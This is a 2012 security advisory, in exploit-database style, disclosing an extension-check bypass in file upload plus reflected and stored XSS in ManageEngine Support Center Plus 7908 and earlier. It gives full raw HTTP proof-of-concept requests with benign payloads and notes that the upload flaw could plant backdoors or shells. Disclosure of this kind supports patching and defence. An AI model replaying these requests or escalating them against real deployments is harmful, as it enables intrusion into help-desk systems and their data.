ManageEngine Support Center Plus 7908 XSS / Shell Upload

`+--------------------------------------------------------------------------------------------------------------------------------+  
# Exploit Title : ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities  
# Date : 06-03-2012  
# Author : xistence (xistence<[AT]>0x90.nl)  
# Software link : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm  
# Vendor site : http://www.manageengine.com/  
# Version : 7908 and lower  
# Tested on : CentOS 5.x  
+--------------------------------------------------------------------------------------------------------------------------------+  
  
  
1) Arbitrary File Upload (File Extension Verification Bypass)  
  
It's possible to bypass the image extension check in the ticket creation editor. Normally you would go to Requests -> New Request -> select the "Insert Image" to upload a picture to be included in the ticket and is restricted to jpg/gif/png files. If you send a POST request directly to the /jsp/UploadImage.jsp?Module=Workorder url you'll be able to upload any file. This might lead to uploading web site files which could be used for malicious actions (backdoors/shells).  
  
Below a sample POST request, note that a valid cookie is needed (and be authenticated) to perform these actions. The POST request uploads a file test.txt with the contents "TEST!"  
  
POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1  
Host: exploitme:8080  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Content-Length: 231  
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855  
Content-Length: 231  
  
-----------------------------135769595918512168611930018855  
Content-Disposition: form-data; name="img_file"; filename="test.txt"  
Content-Type: image/gif  
  
TEST!  
  
-----------------------------135769595918512168611930018855--  
  
  
  
In the HTTP response you'll see this:  
  
<script>var formName = parent.document.getElementById("FORMNAME").value;  
var opts = parent.document.forms[formName].INLINEIMAGES.options;  
var imgName = "1340090056957.txt";  
var option = new Option(imgName, imgName);  
option.selected = true;  
opts[opts.length] = option;  
// parent.showImage("WorkOrder","2","1340090056957.txt");  
parent.ZE.activeEditor.previewImage("/inline/"+"WorkOrder"+"/"+"2"+"/"+"1340090056957.txt");//No i18n</script>  
  
Which makes the following url accessable and will show the "TEST!" in clear text:  
http://<IP ADDRESS>:8080/inline/WorkOrder/2/1340090056957.txt  
  
  
2) Reflected XSS  
  
Proof of Concept:  
http://<IP ADDRESS>:8080/HomePage.do?fromCustomer=%27;alert%28%22Hello%20World%22%29;%20var%20frompor=%27null  
  
  
3) Stored XSS vulnerability  
  
How to replicate:  
  
Requests -> New Request  
Subject: anything  
Description window -> select Edit HTML button -> Insert script code i.e.: <script>alert("Hello World")</script>  
  
POST request headers:  
  
POST /WorkOrder.do HTTP/1.1  
Host: exploitme:8080  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 312  
  
reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=Guest&category=0&item=0&subCategory=0&title=bla&description=bla%3Cscript%3Ealert%28%22Hello+World%22%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO  
  
  
`